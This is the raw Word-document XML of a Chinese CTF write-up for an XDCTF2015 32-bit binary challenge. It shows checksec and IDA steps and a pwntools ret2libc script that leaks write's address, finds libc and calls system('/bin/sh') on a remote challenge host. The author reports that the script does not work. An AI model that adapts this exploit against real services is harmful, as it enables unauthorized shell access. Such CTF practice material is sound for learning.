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9DA1" w14:textId="6135BF30" w:rsidR="00953D16" w:rsidRDefault="00953D16" w:rsidP="00953D16">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先checksec一下文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00953D16">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F4E24A3" wp14:editId="3A0DB72D">
            <wp:extent cx="5105400" cy="1866900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="392320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7F97" w14:textId="52535043" w:rsidR="00953D16" w:rsidRDefault="00953D16" w:rsidP="00953D16">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放到32位ida看一下</w:t>
      </w:r>
      <w:r w:rsidRPr="00953D16">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="613AFBF8" wp14:editId="3B10F9DC">
            <wp:extent cx="5274310" cy="2312035"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="134364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A72E" w14:textId="3A467005" w:rsidR="00953D16" w:rsidRDefault="00953D16" w:rsidP="00953D16">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Shift+f12看一下</w:t>
      </w:r>
      <w:r w:rsidRPr="00953D16">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B444144" wp14:editId="6D1E4016">
            <wp:extent cx="5274310" cy="2323465"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="105257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7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A995" w14:textId="6856765E" w:rsidR="000806BD" w:rsidRDefault="000806BD" w:rsidP="00953D16">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我的理解是这道题开的是nx且shift+f12中没有可用的给了write函数很明显是libc泄露做</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411C9610" w14:textId="578E1449" w:rsidR="000806BD" w:rsidRDefault="000806BD" w:rsidP="000806BD">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看一下我写的脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114F1F3F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from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236E7620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from LibcSearcher import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB672FA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7565DA5A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lastRenderedPageBreak/>
        <w:t>p = remote("61.147.171.103", 57177)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F76A05C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elf = ELF("./2")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F2D864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53644E8A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write_plt = elf.plt["write"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A25F8A5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write_got = elf.got["write"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC0BD17" w14:textId="67DC2B21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start = elf.sym["</w:t>
      </w:r>
      <w:r w:rsidR="00EA5038">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r w:rsidRPr="000806BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5622EB74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14AFA1A7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p.recvuntil(b"Welcome to XDCTF2015~!\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D93559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17E05B38" w14:textId="2718F9C3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offset = 1</w:t>
      </w:r>
      <w:r w:rsidR="00EA5038">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15183C8D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payload1 = b"A" * offset + p32(write_plt) + p32(start) + p32(1) + p32(write_got) + p32(4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD7B274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36E6060D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p.sendline(payload1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3182E881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061E7728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write_addr = u32(p.recvline().strip().ljust(4, b"\x00"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CDE849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4B551F8C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libc = LibcSearcher("write", write_addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA80E56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libc_base = write_addr - libc.dump("write")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193AAFDE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7B799B15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system_addr = libc_base + libc.dump("system")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033F60C1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bin_sh_addr = libc_base + libc.dump("str_bin_sh")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316F83C9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1E1F8E4A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p.recvuntil(b"Welcome to XDCTF2015~!\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA27650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62A1B533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payload2 = b"A" * offset + p32(system_addr) + p32(0xdeadbeef) + p32(bin_sh_addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B15312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5DCCC8CE" w14:textId="77777777" w:rsidR="000806BD" w:rsidRPr="000806BD" w:rsidRDefault="000806BD" w:rsidP="000806BD">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000806BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p.sendline(payload2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14407D00" w14:textId="77777777" w:rsidR="000806BD" w:rsidRPr="000806BD" w:rsidRDefault="000806BD" w:rsidP="000806BD">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10062A36" w14:textId="09082DA3" w:rsidR="000806BD" w:rsidRDefault="000806BD" w:rsidP="000806BD">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="000806BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D6C30" w14:textId="3773BE20" w:rsidR="000C41CE" w:rsidRDefault="000806BD" w:rsidP="000C41CE">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rStyle w:val="a"/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>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打不通，我难以理解我感觉</w:t>
      </w:r>
      <w:r w:rsidR="00EA5038">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这个gdb一直在</w:t>
      </w:r>
      <w:r w:rsidR="000C41CE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说找不到start函数阴飞你爸了，看一下有没有</w:t>
      </w:r>
      <w:r w:rsidR="000C41CE" w:rsidRPr="000C41CE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F2BE574" wp14:editId="503A6806">
            <wp:extent cx="5143500" cy="1720850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1271018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41CE" w:rsidRPr="000C41C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0C41CE" w:rsidRPr="000C41CE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="424FED66" wp14:editId="03B1AB7A">
            <wp:extent cx="5274310" cy="1973580"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="2278337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952A" w14:textId="71A5E0E5" w:rsidR="000C41CE" w:rsidRPr="000C41CE" w:rsidRDefault="000C41CE" w:rsidP="000C41CE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反正大概逻辑就是利用write函数进行泄露libc然后调用。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000C41CE" w:rsidRPr="000C41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683C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FE5A83CE"/>
    <w:lvl w:ilvl="0" w:tplc="7DFA6A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798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16"/>
    <w:rsid w:val="000806BD"/>
    <w:rsid w:val="000C41CE"/>
    <w:rsid w:val="00953D16"/>
    <w:rsid w:val="00CE3973"/>
    <w:rsid w:val="00E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3FC2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9916E785-0A70-43BF-92A4-9CF7F4FF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3D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D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D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D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D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D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D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3D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3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3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3D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3D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3D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3D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3D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3D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3D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D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3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3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D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D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3D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3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2025-10-22T09:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-22T10:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>